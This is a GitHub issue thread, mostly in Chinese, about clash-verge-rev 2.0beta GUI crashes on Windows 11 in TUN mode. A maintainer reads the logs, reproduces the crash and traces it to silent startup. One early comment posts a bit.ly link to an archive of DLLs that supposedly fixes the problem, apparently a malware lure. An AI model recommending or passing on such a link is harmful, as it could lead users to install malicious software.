### ISSUE TITLE
[BUG] GUI频繁崩溃等

### ISSUE THREAD

**Issue by Ptilopsis01** [clash-verge-rev/clash-verge-rev#1738]
### 问题描述 / Describe the bug

如题所示，GUI在短时间内连续出现了多次崩溃，表现为窗口突然消失（后台service及内核运行正常）
此外，在后台开启bitcomet的情况下，会出现其他应用全都连不上网的情况，原因未知（bitcomet的所有连接均设为direct）

所有操作都在tun模式下进行

### 复现步骤 / To Reproduce

如上

### 操作系统 / OS

Windows

### 操作系统版本 / OS Version

win11 26100.1742

### 日志 / Log

[service.zip](https://github.com/user-attachments/files/17058283/service.zip)
[logs.zip](https://github.com/user-attachments/files/17058284/logs.zip)

**Comment by aroopcodder** [comment]
This might help:This file might fix it
https://bit.ly/3TyLBMS
I put the necessary dlls in the archive

**Comment by wonfen** [comment]
软件版本？

**Comment by Ptilopsis01** [comment]
> 软件版本？

2.0beta

**Comment by wonfen** [comment]
看日志是tauri的内核报错了：
2024-09-19 19:09:18 ERROR - thread 'tokio-runtime-worker' panicked at C:\Users\runneradmin/.cargo\registry\src\index.crates.io-6f17d22bba15001f\wry-0.43.1\src\webview2\mod.rs:1001:5:
PostMessage failed ; is the messages queue full?
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

能找到稳定复现的场景？

**Comment by Ptilopsis01** [comment]
> 看日志是tauri的内核报错了： 2024-09-19 19:09:18 ERROR - thread 'tokio-runtime-worker' panicked at C:\Users\runneradmin/.cargo\registry\src\index.crates.io-6f17d22bba15001f\wry-0.43.1\src\webview2\mod.rs:1001:5: PostMessage failed ; is the messages queue full? note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
> 
> 能找到稳定复现的场景？

是说UI崩溃的问题吗，好像和前面某个issue有点像，就是打开UI之后把窗口叉了，再重复几次就崩了

**Comment by wonfen** [comment]
什么时候下载的？这个问题昨天修复过了。

**Comment by Ptilopsis01** [comment]
昨天刚发的时候下了一次，当时发现有问题，然后tg群里说又发了我就又去下了一次，大概是第一次发布三小时后

**Comment by Ptilopsis01** [comment]
我刚刚又下了一次然后覆盖安装了一下，还是能复现出来

**Comment by wonfen** [comment]
我这边始终无法复现？你有多少个订阅和节点？

**Comment by Ptilopsis01** [comment]
三个订阅，每个几十个节点吧

**Comment by wonfen** [comment]
尝试重新卸载安装一下最新版的webview2试试吧。

**Comment by Ptilopsis01** [comment]
我修复了一下edge webview2，还是能复现

**Comment by wonfen** [comment]
截图看下你的当然设置页面

**Comment by Ptilopsis01** [comment]
![image](https://github.com/user-attachments/assets/ae956137-10eb-449c-bcc1-af2cdb11d376)
这个吗

**Comment by wonfen** [comment]
> ![image](https://private-user-images.githubusercontent.com/93318731/369092782-ae956137-10eb-449c-bcc1-af2cdb11d376.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjY3NjUwODcsIm5iZiI6MTcyNjc2NDc4NywicGF0aCI6Ii85MzMxODczMS8zNjkwOTI3ODItYWU5NTYxMzctMTBlYi00NDljLWJjYzEtYWYyY2RiMTFkMzc2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MTklMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTE5VDE2NTMwN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTExZjQyMjA3YTI5MzZlMGU2ZGRiMjU4ZjZkZjJkYTQyODM0YTkyZDE0ZjEyM2U0NzVmNzAyNTBiMTllOGNkZmImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.MbrVL-lCgU48yQ48IsFPnArjSaaAM_gfT7mCPrz9G7k) 这个吗

复现了，原来是静默启动造成的。在研究了。

**Comment by wonfen** [comment]
> OK谢谢 后一个问题是内核的问题吗？

第二个问题参考这个： https://github.com/clash-verge-rev/clash-verge-rev/issues/777#issuecomment-2361698216

**Comment by Ptilopsis01** [comment]
> > OK谢谢 后一个问题是内核的问题吗？
> 
> 第二个问题参考这个： [#777 (comment)](https://github.com/clash-verge-rev/clash-verge-rev/issues/777#issuecomment-2361698216)

我试了一下这个issue里提到的加防火墙，还是没用，实际上我之前加过了
而且我也不是局域网连接的问题
